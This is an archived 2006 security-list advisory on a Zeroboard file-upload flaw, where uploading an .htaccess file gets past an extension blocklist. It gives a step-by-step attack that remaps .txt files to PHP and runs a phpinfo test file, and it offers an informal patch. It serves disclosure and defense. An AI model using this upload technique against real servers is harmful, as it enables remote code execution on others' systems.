lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri Jun 16 09:13:47 2006
From: mins at wins21.com (Choi Min-sung)
Subject: Zeroboard File Upload & extension bypass
	Vulnerability

Zeroboard File Upload & extension bypass Vulnerability 

Author : Choi Min-sung (mins __at__ wins21.com)
Product : Zeroboard  http://www.nzeo.com
Verndor-Patches : Unpatched
Impact : remote code execution



Summary
=======

Basically, the PHP, HTML, and CGI files are prohibited to upload in
Zeroboard. But uploading of the other files which can 

modify the configuration of Apache such as .htaccess is not considered as a
serious issue. Therefore, an unknown attacker can 

execute any malicious codes on the system and acquire system control also.


Affected Products
=================

* The FileType in the .htaccess can be modified by configuring the Override
FileInfo or OverrideAll in the httpd.conf of 

Apache. 
* Zeroboeard4.1pl8 or earlier  


Details
=======

Zeroboard basically prohibits uploading execution scripts such as php, html,
cgi, and asp. 

write_ok.php 
------------
// Upload prohibited 
if($file1_size>0) { 
$s_file_name1=$file1_name; 
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm
",$s_file_name1)||eregi("\.shtm",$s_file_name1)

||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi
("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)

||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML
and PHP related files cannot be uploaded."); 


: But the above codes cannot block the upload of files such as .htaccess and
etc. 


The Process of an Actual Attack 
=============================== 
- Attack Scenario 

1. A malicious user uploads a following '.htaccess' file. 

.htaccess 
--------- 
AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt 

2. A malicious user uploads a following .txt file. 
test.txt 
-------- 
<? phpinfo(); ?>

3. The PHP script is executed, because the .txt file is modified to execute
the PHP script. 

$ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt 


Solution
========

Below is an informal patch that I made. 
Vendor Proceed -> Unpatched 

write_ok.php.patch 
------------------ 
--- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 
+++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 
@@ -208,7 +208,7 @@ 

// Upload prohibited 
if($file1_size>0) { 
$s_file_name1=$file1_name; 
-
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm
",$s_file_name1)||eregi("\.shtm",$s_file_name1)

||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",
$s_file_name1)||eregi("\.asp",$s_file_name1)

||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML
and PHP related files cannot be uploaded."); 

+
if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\
.phtm",$s_file_name1)||eregi

("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_fil
e_name1)||eregi("\.php",$s_file_name1)||eregi

("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file
_name1)||eregi("\.pl",$s_file_name1)) Error("The 

HTML and PHP related files cannot be uploaded."); 

//Check extension 
if($setup[pds_ext1]) { 


Timeline
========
01/09/2005 Initial vendor notification. I made Temporary Patch.
02/09/2005 Vendor confirms vulnerability.
15/03/2006 Released Patch 4.1pl8 (NOT PATCHED THIS VULNERABILITY)
12/06/2006 Vulnerability reported to KISA (Korea Infomation Security Agency)
KRCert
12/06/2006 Final Vendor Contact.
12/06/2006 Secunia notified of this vulnerability.
16/06/2006 Public disclosure.
 
Credits  
=======
Discovered by  Choi Min-sung, WINSTechnet CERT
 

Reference Site  
==============
http://securecast.wins21.com/zerovul.html
http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391


Powered by blists - more mailing lists